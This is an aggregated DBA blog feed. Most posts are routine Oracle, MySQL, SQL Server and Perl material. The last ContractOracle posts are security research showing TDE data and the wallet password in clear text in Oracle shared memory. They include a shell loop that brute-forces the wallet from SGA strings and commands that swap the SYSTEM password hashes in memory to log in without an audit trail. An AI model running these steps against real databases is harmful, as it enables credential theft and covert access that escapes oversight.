
DBA Blogs

Oracle DBA Training Options Are Changing

Training options for Oracle Database DBAs are changing and, generally, I don't think they are changing for the better. Companies don't value Oracle Database Administrators like they used to, and it shows in their lack of investment in professional development.

When I travel a long way from home, I tend to get very reflective about life, death and beyond. On my way home from teaching an onsite two-day Oracle performance tuning seminar coupled with a one-day predictive analysis (forecasting) class in Ghana (yes, Ghana as in AFRICA) I started thinking about how fortunate the Ghana DBAs I taught are. Clearly their management is willing to invest in their DBAs' future. This is very, very rare.

Today most Oracle DBAs receive what I call "Training By Google." You know: blog posts, YouTube videos and various syntax websites. While these are all valuable (I am a content creator myself with my blog posts and videos), they are no substitute for instructor-led training. Not even close! So what is happening that is forcing Oracle DBAs to change their training habits?

So Why The Change? Three Reasons
1. Training Budget. Over the past five years I have been disappointed (more like disturbed) that most companies do not provide the training DBAs need. They just won't do it. IT managers (not typically DBA managers) believe their staff can get by with "Training By Google." It's stupid and foolish. It tells DBAs they are worthless and leaves them unprepared to perform at their best. And, of course, that ends up hurting the company they work for. Stupid and foolish.

Are we then surprised by the results: poorly performing systems, down production systems, massive security breaches, and DBAs hopping from one company to another?

2. Travel Budget. A nasty tactic many companies use is to provide a minimal training budget but without a travel budget. If you want specialized and advanced training, you'll probably have to travel to get to it. Maybe not hundreds or thousands of miles, but probably more than you want to commute each day.

Essentially the company is splitting the training cost with the DBA and ensuring the DBA really, really wants the training. OK, I can respect that. But, I think a company that does not truly provide training for its employees (human beings that spend a significant portion of their lives doing whatever it takes to get the job done) is cruel and frankly immoral.

3. More Training Options. The good news for Oracle DBAs is there is more information and training options available today than ever before. When the orapub.com website began in 1995, doing a "tail -f" on the web log was a lesson in world geography. It was amazing watching line after line stream by as DBAs from all over the world were looking for Oracle performance materials through the web. Now there is much more available. Training options for Oracle DBAs now include traditional instructor led training (ILT), web sites from content aggregators (people who pull together content for us), content creators (like myself), and online training. I'm very excited about online training and have made a significant investment in OraPub's Online Institute.

Summary
So there you have it. Because of economics, the devaluation of DBAs as human beings and the increase in training options, the Oracle DBA training landscape is changing. If you believe this, the next question is, "What is good content?" That will be the subject of my next posting!

Enjoy your work and thanks for reading!

Craig.

https://resources.orapub.com/OraPub_Online_Seminars_About_Oracle_Database_Performance_s/100.htm
You can watch seminar introductions (like above) for free on YouTube!
If you enjoy my blog, I suspect you'll get a lot out of my online or in-class training. For details go to www.orapub.com. I also offer on-site training and consulting services.

P.S. If you want me to respond to a comment or you have a question, please feel free to email me directly at craig@orapub.com. Another option is to send an email to OraPub's general email address, which is currently info@orapub.com.

Categories: DBA Blogs

Presenting at UKOUG Tech14 Conference (Ian Fish, U K Heir)

Richard Foote - Tue, 2014-07-15 01:52
I’ve been lucky enough to present at various conferences, seminars and user group events over the years in some 20-odd countries. But somewhere I’ve never quite managed to present before is the place of my birth, the UK. Well, this year I’ve decided to end my drought and submitted a number of papers for the UKOUG Tech14 Conference and […]
Categories: DBA Blogs

MySQL on-premise to Amazon RDS migration tips

Kubilay Çilkara - Mon, 2014-07-14 13:27
Things to watch and do when migrating MySQL databases from ‘on-premise’ to Amazon AWS RDS
  • Not all versions of databases can be migrated to RDS, especially if you want to do a zero-downtime migration. Make sure you know which versions are possible; at the time of writing, Amazon announced that it will support any version of MySQL from 5.1 and above.
  • In a zero-downtime migration to Amazon RDS, you work with mysqldump or mydumper to import the baseline data, and then you use MySQL Replication and the binary log position to apply the additional records created during the import (the delta). That is, it is possible to create a MySQL slave in the Amazon AWS cloud!
  • Once you have confirmed that your on-premise MySQL version is compatible, you can use mysqldump with the --master-data parameter to export your data, including the binlog position coordinates at the time of the export. If your database is big, you can use mydumper to do this with parallel streams. You will use the coordinates and MySQL replication to catch up with the on-premise master database when creating the MySQL slave in RDS (see the sketch just after this list).
  • Use different database parameter groups for different databases.
  • As you load the RDS database using myloader or mysql, the operation might take a long time depending on the size of your database. If this is the case, disable automated backups (this also stops binary logging), and try using one of the better-spec RDS instance classes, with provisioned IOPS, for the duration of the operation. You can always downsize the RDS instance after you have completed the initial load.
  • After you have completed the initial load, use Multi-AZ, which is a synchronous standby (in Oracle parlance), and schedule the backups immediately, before you open your applications to the database, as the initial backup requires a reboot.
  • Beware that there is no SSH access to RDS, which means you have no access to the file system.
  • Get the DB security groups right and make sure your applications can access the RDS instances.
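As a rough sketch of that dump-and-catch-up flow (host names, credentials and binlog coordinates below are placeholders; mysql.rds_set_external_master and mysql.rds_start_replication are the RDS-provided procedures for pointing an RDS instance at an external master):

mysqldump --master-data=2 --single-transaction --all-databases -h onprem-host -u repl -p > baseline.sql
mysql -h mydb.xxxxxx.us-east-1.rds.amazonaws.com -u admin -p < baseline.sql

-- then, on the RDS instance, using the coordinates recorded in baseline.sql
CALL mysql.rds_set_external_master ('onprem-host', 3306, 'repl', 'repl_password', 'mysql-bin.000042', 120, 0);
CALL mysql.rds_start_replication;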
Categories: DBA Blogs

Lock Timeout Error While Creating Database

Pythian Group - Mon, 2014-07-14 08:07

Recently I worked on an issue where a third-party application was failing during installation. Below is the error returned by the application.

Lock request time out period exceeded. (Microsoft SQL Server, Error: 1222)

The application was failing while trying to create a database. It appeared to have a default timeout setting of about 60 seconds, after which it failed because the command had not yet returned any results.

I tried creating a test database directly from SQL Server Management Studio and noticed that it was taking a long time as well. When I checked sys.sysprocesses, I found that the session creating the database was accumulating IO-related waits.
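A quick way to see those waits while the CREATE DATABASE is running is to query sys.sysprocesses for suspended sessions; a sketch (filter as appropriate for your instance):

SELECT spid, status, cmd, lastwaittype, waitresource
FROM sys.sysprocesses
WHERE status = 'suspended';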

Some of the reasons why creating a database might take more time than expected are:

  • IO bottleneck on the drive where we are creating the database files
  • Large size of Model database
  • Instant File Initialization is not enabled

I verified the size of the model database files and found that the model data file was 5 GB and its log file 1 GB. I reduced the data file to 1 GB and the log file to 512 MB, and was then able to create the test database quickly.
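For reference, shrinking model can be done with DBCC SHRINKFILE, using model's default logical file names and target sizes in MB; a sketch along these lines:

USE model;
DBCC SHRINKFILE (modeldev, 1024); -- data file down to ~1 GB
DBCC SHRINKFILE (modellog, 512);  -- log file down to ~512 MB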

Now we started the installation of the Application and it completed successfully as well.

Categories: DBA Blogs

Script to Get the Create Date of an Object from Multiple Databases

Pythian Group - Mon, 2014-07-14 08:04

As a DBA, it is common to get a request to run scripts against production databases. However, there can be environments with multiple databases on the same instance, each of which the script needs to be run against. I have seen an environment with 50+ databases sharing the same schema but different data, each database serving a different customer.

When we get a request to run large scripts against many databases, it is possible, through user oversight, to miss running the script against one or more of them. The requirement then becomes verifying whether the script was executed against all the databases. One way to do this is to pick an object (stored procedure, table, view, function) which was created as part of the script execution, get the create date of that object, and verify that it shows the date and time when the script was run. The challenge is to get the create date of a specific object from all databases at once, with little work.

Below is code which fetches the create date of the specified object (stored procedure, table, view, function) from all user databases on an instance. Pass the object name as @ObjName in the 7th line of the code. Run the code, verify the create date in the output, and confirm that the script was executed and created the object at the time the script was run.

-- Script Originally Written By: Keerthi Deep | http://www.SQLServerF1.com/

Set NOCOUNT ON
Declare @ObjName nvarchar(300)
declare @dbn nvarchar(200)

Set @ObjName = 'Object_Name' -- Specify the name of the Stored Procedure/ Table/View/Function

create table #DatabaseList(dbname nvarchar(2000)) 

Insert into #DatabaseList select name from sys.sysdatabases
where name not in ('master', 'msdb', 'model','tempdb')
order by name asc 

--select * from #DatabaseList
Create table #Output_table (DB nvarchar(200), crdate datetime, ObjectName nvarchar(200))
declare c1 cursor for select dbname from #DatabaseList
open c1
Fetch next from c1 into @dbn
WHILE @@FETCH_STATUS = 0
BEGIN

declare @Query nvarchar(2048)
Set @Query = 'select ''' + @dbn + ''' as DBName, crdate, [name] from ' + @dbn + '.sys.sysobjects where name = ''' + @ObjName + ''''
--print @Query
Insert into #Output_table Exec sp_executesql @Query

FETCH NEXT FROM c1 into @dbn
END
CLOSE c1
DEALLOCATE c1

select * from #Output_table
Drop table #Output_table
Drop table #DatabaseList

Limitations:
This will only work if the object was created with a CREATE command; it will not work if an ALTER command was used, since an ALTER does not change the create date.
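One possible workaround (an untested sketch) is to read modify_date alongside create_date from sys.objects, since an ALTER does update modify_date. For a single database that is just:

select name, create_date, modify_date
from sys.objects
where name = 'Object_Name';

The dynamic SQL above could be adjusted the same way, with a matching extra column added to #Output_table.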

Any suggestions are welcome.

Categories: DBA Blogs

Oracle encrypted table data found unencrypted in SGA

ContractOracle - Sun, 2014-07-13 21:29
When data needs to be kept private, or companies are worried about data leakage, then they often choose to store that data in encrypted columns in the table using Oracle Transparent Data Encryption. 

I wanted to see if that data was stored in the SGA in an unencrypted format.  I ran the following test from sqlplus.

CDB$ROOT@ORCL> create table credit_card_number(card_number char(16) encrypt);

Table created.

CDB$ROOT@ORCL> insert into credit_card_number values ('4321432143214321');

1 row created.

CDB$ROOT@ORCL> update credit_card_number set card_number = '5432543254325432' where card_number = '4321432143214321';

1 row updated.

CDB$ROOT@ORCL> VARIABLE cardnumber char(16);
CDB$ROOT@ORCL> EXEC :cardnumber := '6543654365436543';

PL/SQL procedure successfully completed.

CDB$ROOT@ORCL> update credit_card_number set card_number = :cardnumber where card_number = '5432543254325432';

1 row updated.

CDB$ROOT@ORCL> commit;

Now we search SGA for the data that should be encrypted to keep it private.  


[oracle@localhost shared_memory]$ ./sga_search 4321432143214321
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 459100
4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 3244704
4321432143214321
/dev/shm/ora_orcl_38895617_29 found string at 2529984
4321432143214321
[oracle@localhost shared_memory]$ ./sga_search 5432543254325432
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 459061
5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 4106466
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2075064
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2528552
5432543254325432
/dev/shm/ora_orcl_38895617_28 found string at 1549533
5432543254325432
[oracle@localhost shared_memory]$ ./sga_search 6543654365436543
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 6543654365436543
/dev/shm/ora_orcl_38895617_29 found string at 3801400
6543654365436543

The output shows that all 3 of the card_number values used in the demonstration can be found in SGA, sometimes in multiple locations.  Flushing the buffer cache did not clear the data from SGA, but flushing the shared pool did.  Further analysis is needed to confirm exactly where in the shared pool the unencrypted data is being stored to confirm if it is in sql statements, sql variables, or interim values kept by the encryption process.  Further testing is also needed to see if it is possible to avoid potential data leakage by using bind variables or wrapping sql in plsql.  In the meantime ... be aware that data you believe to be encrypted may actually be stored in memory in clear text visible to anyone with privileges to connect to the SGA.
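For reference, the flushes mentioned above were done with the standard commands :-

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> alter system flush shared_pool;

System altered.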

Oracle TDE FAQ  :- http://www.oracle.com/technetwork/database/security/tde-faq-093689.html
States that "With TDE column encryption, encrypted data remains encrypted inside the SGA, but with TDE tablespace encryption, data is already decrypted in the SGA, which provides 100% transparency."
Categories: DBA Blogs

Oracle encryption wallet password found in SGA

ContractOracle - Sun, 2014-07-13 20:51
If companies are worried about data privacy or leakage, they are often advised to encrypt sensitive data inside Oracle databases to stop DBAs from accessing it, and to implement "separation of duties" so that only the application or data owner has the encryption keys or wallet password.  One method to encrypt data is to use Oracle Transparent Data Encryption, which stores keys in the Oracle wallet protected by a wallet password.  Best practice dictates using a very long wallet password to avoid rainbow table and brute force attacks, and keeping the key and password secret.

I wrote a simple program to search for data in Oracle shared memory segments, and it was able to find the Oracle wallet password, which means anyone who can connect to the shared memory can get the wallet password and access the encrypted data.  The following demonstrates this :-

First open and close the wallet using the password :-


CDB$ROOT@ORCL> alter system set encryption wallet open identified by "verylongverysecretwalletpassword1";

System altered.

CDB$ROOT@ORCL> alter system set wallet close identified by "verylongverysecretwalletpassword1";

System altered.


Now search for the wallet password in SGA :-
[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1
The search found the password in SGA, so it should be possible to analyse the memory structure that currently stores the known password, and create another program to directly extract passwords on unknown systems.  It may also be possible to find the password by selecting from v$ or x$ tables.  I have not done that analysis, so I don't know how difficult it would be, but if the password is stored, it will be possible to extract it.  Even if it is mixed up with a lot of other sql text and variables, it would be very simple to just try opening the wallet using every string stored in SGA.
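A crude, untested sketch of that brute-force idea, assuming OS access to the shared memory files and a local sysdba login :-

[oracle@localhost shared_memory]$ strings /dev/shm/ora_orcl_* | sort -u | while read s; do
>   echo "alter system set encryption wallet open identified by \"$s\";" | sqlplus -s / as sysdba | grep -q "System altered" && { echo "Wallet password: $s"; break; }
> done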
The password is still in SGA after flushing the buffer cache.
CDB$ROOT@ORCL> alter system flush buffer_cache;
System altered.

[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1

After flushing the shared pool the password is no longer available.  
CDB$ROOT@ORCL> alter system flush shared_pool;
System altered.

[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
[oracle@localhost shared_memory]$
As this password really should be secret, Oracle should not store it.  More research is needed to confirm whether the password can be hidden by using bind variables, obfuscation, or wrapping it in PL/SQL.
Categories: DBA Blogs

RAC Commands : 1 -- Viewing Configuration

Hemant K Chitale - Sun, 2014-07-13 05:58
In 11gR2

Viewing the configuration of a RAC database

[root@node1 ~]# su - oracle
-sh-3.2$ srvctl config database -d RACDB
Database unique name: RACDB
Database name: RACDB
Oracle home: /u01/app/oracle/rdbms/11.2.0
Oracle user: oracle
Spfile: +DATA1/RACDB/spfileRACDB.ora
Domain:
Start options: open
Stop options: immediate
Database role: PRIMARY
Management policy: AUTOMATIC
Server pools: RACSP
Database instances:
Disk Groups: DATA1,FRA,DATA2
Mount point paths:
Services: MY_RAC_SVC
Type: RAC
Database is policy managed
-sh-3.2$

So, we see that :
a) The database name is RACDB
b) It is a Policy Managed database (not Administrator Managed)
c) It is dependent on 3 ASM Disk Groups DATA1, DATA2, FRA
d) There is one service called MY_RAC_SVC configured
e) The database is in the  RACSP server pool
f) The database is configured to be Auto-started when Grid Infrastructure starts


Viewing the configuration of a RAC service

-sh-3.2$ srvctl config service -d RACDB -s MY_RAC_SVC
Service name: MY_RAC_SVC
Service is enabled
Server pool: RACSP
Cardinality: UNIFORM
Disconnect: false
Service role: PRIMARY
Management policy: AUTOMATIC
DTP transaction: false
AQ HA notifications: false
Failover type: NONE
Failover method: NONE
TAF failover retries: 0
TAF failover delay: 0
Connection Load Balancing Goal: LONG
Runtime Load Balancing Goal: NONE
TAF policy specification: NONE
Edition:
Service is enabled on nodes:
Service is disabled on nodes:
-sh-3.2$

So, we see that :
a) The service name is MY_RAC_SVC
b) The UNIFORM cardinality means that it is to run on all active nodes in the server pool
c) The server-side connection load balancing goal is LONG (for long running sessions)
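Clients would connect to this service (rather than to a specific instance) with a tnsnames.ora entry along the following lines; the SCAN host name shown here is made up:

MY_RAC_SVC =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = rac-scan.mydomain.com)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = MY_RAC_SVC)
    )
  )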


Viewing the configuration of Server Pools

-sh-3.2$ srvctl config srvpool
Server pool name: Free
Importance: 0, Min: 0, Max: -1
Candidate server names:
Server pool name: Generic
Importance: 0, Min: 0, Max: -1
Candidate server names:
Server pool name: RACSP
Importance: 0, Min: 0, Max: 2
Candidate server names:
-sh-3.2$

So we see that :
a) RACSP is the only user-created (named) server pool
b) This server pool has a maximum of 2 nodes
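If another server were added to the cluster, the pool's ceiling could be raised accordingly; for example (11gR2 syntax, shown here as an illustration only):

-sh-3.2$ srvctl modify srvpool -g RACSP -u 3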

Categories: DBA Blogs

ORA-09925: Unable to create audit trail file

Oracle in Action - Sat, 2014-07-12 03:33

RSS content

I received this error message when I started my virtual machine and tried to logon to my database as sysdba to startup the instance.
[oracle@node1 ~]$ sqlplus / as sysdba

ERROR:
ORA-09925: Unable to create audit trail file
Linux Error: 30: Read-only file system
Additional information: 9925
ORA-09925: Unable to create audit trail file
Linux Error: 30: Read-only file system
Additional information: 9925
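Linux error 30 is EROFS, i.e. the filesystem holding the audit file destination had been remounted read-only, so Oracle could not write the audit trail file. This is easy to confirm from the shell (the path below is just an example):

[oracle@node1 ~]$ touch /u01/app/oracle/test_write
touch: cannot touch `/u01/app/oracle/test_write': Read-only file system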

- I rebooted my machine and got the following messages, which pointed to errors encountered during the filesystem check and instructed me to run fsck manually.

[root@node1 ~]# init 6

Checking filesystems

/: UNEXPECTED INCONSISTENCY; RUN fsck MANUALLY.
(i.e., without -a or -p options)
*** An error occurred during the filesystem check.
*** Dropping you to a shell; the system will reboot
*** when you leave the shell.
Give root password for maintenance
(or type Control-D to continue):

- I entered the password for root to initiate the filesystem check. As a result, I was prompted multiple times to allow fixing of various filesystem errors.

(Repair filesystem) 1 # fsck
Fix(y)?

- After all the errors had been fixed, the filesystem check was restarted.

Restarting e2fsck from the beginning...

/: ***** FILE SYSTEM WAS MODIFIED *****
/: ***** REBOOT LINUX *****

- After the filesystem had finally been checked as correct, I exited for the reboot to continue.

(Repair filesystem) 2 # exit

- After the reboot, I could successfully connect to my database as sysdba.

[oracle@node1 ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.1.0 Production on Sat Jul 12 09:21:52 2014

Copyright (c) 1982, 2009, Oracle. All rights reserved.

Connected to an idle instance.

SQL>

I hope this post was useful.

Your comments and suggestions are always welcome.


Categories: DBA Blogs

Finished first pass through Alapati 12c OCP upgrade book

Bobby Durrett's DBA Blog - Fri, 2014-07-11 17:29

I just finished reading Sam Alapati’s 12c OCP upgrade book for the first time, and I really like it because it covers content I hadn’t discovered through my study of the Oracle manuals.  It also did a good job explaining some things that Oracle’s manuals left unclear.

After reading each chapter I took the end of chapter test and got between 60% and 75% of the questions right.  Next I plan to take the computer based test that was on the CD that came with the book and which covers both parts of the upgrade exam.

I did find minor errors throughout the book, but I still found it very useful, especially after having already studied the same topics on my own without a study guide like this one to direct me.  The author’s insights into the test and the material it covers add value because they guide me to the areas I need to focus on.

- Bobby

Categories: DBA Blogs

OTN Latin America Tour, 2014

Hans Forbrich - Fri, 2014-07-11 17:12
The dates and the speakers for the Latin America Tour have been announced.

http://www.oracle.com/technetwork/es/community/user-groups/otn-latinoamerica-tour-2014-2213115-esa.html


Categories: DBA Blogs

A Ringleader Proxy for Sporadically-Used Web Applications

Pythian Group - Fri, 2014-07-11 08:46

As you might already know, I come up with my fair share of toy web applications.

Once created, I typically throw them on my server for a few weeks but, as the resources of good ol’ Gilgamesh are limited, they eventually have to be turned off to make room for the next wave of shiny new toys. Which is a darn shame, as some of them can be useful from time to time. Sure, running all webapps all the time would be murder for the machine, but there should be a way to only fire up the application when it’s needed.

Of course there’s already a way of doing just that. You might have heard of it: it’s called CGI. And while it’s perfectly possible to run PSGI applications under CGI, it’s also… not quite perfect. The principal problem is that there is no persistence at all between requests (of course, with the help of mod_perl there could be persistence, but that would defeat the purpose), so it’s not exactly snappy. Although, to be fair, it’d probably still be fast enough for most small applications. But still, it feels clunky. Plus, I’m just plain afraid that if I revert to using CGI, Sawyer will burst out of the wall like a vengeful Kool-Aid Man and throttle the life out of me. He probably wouldn’t, but I prefer not to take any chances.

So I don’t want single executions and I don’t want perpetual running. What I’d really want is something in-between. I’d like the applications to be disabled by default, but if a request comes along, to be awaken and ran for as long as there is traffic. And only once the traffic has abated for a reasonable amount of time do I want the application to be turned off once more.

The good news is that it seems that Apache’s mod_fastcgi can fire dynamic applications upon first request. If that’s the case, then the waking-up part of the job comes for free, and the shutting down is merely a question of periodically monitoring the logs and killing processes when inactivity is detected.

The bad news is that I only heard that after I was already halfway done shaving that yak my own way. So instead of cruelly dropping the poor creature right there and then, abandoning it with a punk-like half-shave, I decided to go all the way and see how a Perl alternative would look.

It’s all about the proxy

My first instinct was to go with Dancer (natch). But a quick survey of the tools available revealed something even more finely tuned to the task at hand: HTTP::Proxy. That module does exactly what it says on the tin: it proxies http requests, and allows you to fiddle with the requests and responses as they fly back and forth.

Since I own my domain, all my applications run on their own sub-domain name. With that setting, it’s quite easy to have all my sub-domains point to the port running that proxy and have the waking-up-if-required and dispatch to the real application done as the request comes in.


use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time = 5;
my $shutdown_delay = 10;

my %services = (
    'foo.babyl.ca' => $foo_config,
    'bar.babyl.ca' => $bar_config,

);

$proxy->push_filter( request => 
    HTTP::Proxy::HeaderFilter::simple->new( sub {

            my( $self, $headers, $request ) = @_;

            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $service->is_running ) {
                $service->start;
                sleep 1;
            }

            # store the latest access time
            $service->store_access_time(time);
    }),
);

$proxy->start;

With this, we already have the core of our application, and only need a few more pieces, and details to iron out.

Enter Sandman

An important one is how to detect if an application is running, and when it has gone inactive. For that I went for a simple mechanism: using CHI to provide me with a persistent and central place to keep information about my applications. As soon as an application comes up, I store the time of the current request in its cache, and each time a new request comes in, I update the cache with the new time. That way, the existence of the cache tells me if the application is running, and knowing if the application should go dormant is just a question of seeing if the last access time is old enough.


use CHI;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);

...;

# when checking if the host is running
unless ( $chi->get($host) ) {
    $service->start;
    sleep 1;
}

...;

# and storing the access time becomes
$chi->set( $host => time );

# to check periodically, we fork a sub-process 
# and we simply endlessly sleep, check, then sleep
# some more

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $s = shift;

    my $time = $chi->get($s);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$s}->stop;

    $chi->remove($s);
}

Minding the applications

The final remaining big piece of the puzzle is how to manage the launching and shutting down of the applications. We could do it in a variety of ways, beginning with plain system calls. Instead, I decided to leverage the service manager Ubic. With the help of Ubic::Service::Plack, setting up a PSGI application is as straightforward as one could wish for:


use Ubic::Service::Plack;

Ubic::Service::Plack->new({
    server => "FCGI",
    server_args => { listen => "/tmp/foo_app.sock",
                     nproc  => 5 },
    app      => "/home/web/apps/foo/bin/app.pl",
    port     => 4444,
});

Once the service is defined, it can be started/stopped from the CLI. And, which is more interesting for us, straight from Perl-land:


use Ubic;

my %services = (
    # sub-domain      # ubic service name
    'foo.babyl.ca' => 'webapp.foo',
    'bar.babyl.ca' => 'webapp.bar',
);

$_ = Ubic->service($_) for values %services;

# and then to start a service
$services{'foo.babyl.ca'}->start;

# or to stop it
$services{'foo.babyl.ca'}->stop;

# other goodies can be gleaned too, like the port...
$services{'foo.babyl.ca'}->port;

Now all together

And that’s all we need to get our ringleader going. Putting it all together, and tidying it up a little bit, we get:


use 5.20.0;

use experimental 'postderef';

use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

use Ubic;

use CHI;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time      = 5;
my $shutdown_delay = 10;

my $ubic_directory = '/Users/champoux/ubic';

my %services = (
    'foo.babyl.ca' => 'webapp.foo',
);

$_ = Ubic->service($_) for values %services;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);


$proxy->push_filter( request => HTTP::Proxy::HeaderFilter::simple->new(sub{
            my( $self, $headers, $request ) = @_;
            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $chi->get($host) ) {
                $service->start;
                sleep 1;
            }

            # always store the latest access time
            $chi->set( $host => time );
    }),
);

start_sandman();

$proxy->start;

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $service = shift;

    my $time = $chi->get($service);

    # no cache? assume not running
    return if !$time or time - $time <= $shutdown_delay;

    $services{$service}->stop;

    $chi->remove($service);
}

It’s not yet complete. The configuration should go in a YAML file (sketched below), we should have some more safeguards in case the cache and the real state of the application aren’t in sync, and the script itself should be started by Ubic too to make everything Circle-of-Life-perfect. Buuuuut as it is, I’d say it’s already a decent start.
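For what it’s worth, that YAML file might look something like this (a hypothetical ringleader.yml reusing the names from above):

# ringleader.yml (hypothetical)
proxy_port: 3000
shutdown_delay: 10
services:
  foo.babyl.ca: webapp.foo
  bar.babyl.ca: webapp.bar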

Categories: DBA Blogs

Log Buffer #379, A Carnival of the Vanities for DBAs

Pythian Group - Fri, 2014-07-11 07:34

During summer time in the Northern hemisphere, and winter time in the Southern hemisphere, bloggers are solving key problems while sitting beside the bonfire, or enjoying that bbq. This Log Buffer Edition shares some of those solutions.


Oracle:

3 Key Problems To Solve If You Want A Big Data Management System

OpenWorld Update: Content Catalog NOW LIVE!

Interested in Showcasing your Solutions around Oracle Technologies at Oracle OpenWorld?

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

What You Need to Know about OBIEE 11.1.1.7

SQL Server:

Interoperability between Microsoft and SOA Suite 12c

This article describes a way to speed up various file operations performed by SQL Server.

The Mindset of the Enterprise DBA: Creating and Applying Standards to Our Work

Stairway to T-SQL: Beyond The Basics Level 8: Coding Shortcuts using += and -= Operators

Microsoft Azure Diagnostics Part 2: Basic Configuration of Azure Cloud Service Diagnostics

MySQL:

MySQL Enterprise Monitor 2.3.18 has been released

Harnessing the power of master/slave clusters to operate data-driven businesses on MySQL

NoSQL Now! Conference – coming to San Jose, CA this August!

Manually Switch Slaves to new Masters in mySQL 5.6 (XTRADB 5.6)

How to Configure ClusterControl to run on nginx

Categories: DBA Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 03:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database-level security.  The following example expands on that to show how to modify password hashes in the SGA, allowing connection to the database without changing passwords in the datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated, that the database did not crash or detect the data change, and that it allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record and no evidence in the datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back out the changes made to SGA, restoring the original hash values, to cover up completely (see below).
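Backing out would simply mean running the same replacements with the parameters reversed, restoring the original hashes :-

./sga_data_replace E235D5FC5165F1EC 09F3A178C7F6F650

./sga_data_replace 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0

./sga_data_replace E30710ABA2D3492243C239A8854B4E21 076F596A5F2AD47593407D24734BF6C0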
Sample output from the first SGA update command above follows :-
[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC


WARNING WARNING WARNING

This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.

USAGE :- sga_data_replace searchstring replacestring

Number of input parameters seem correct.
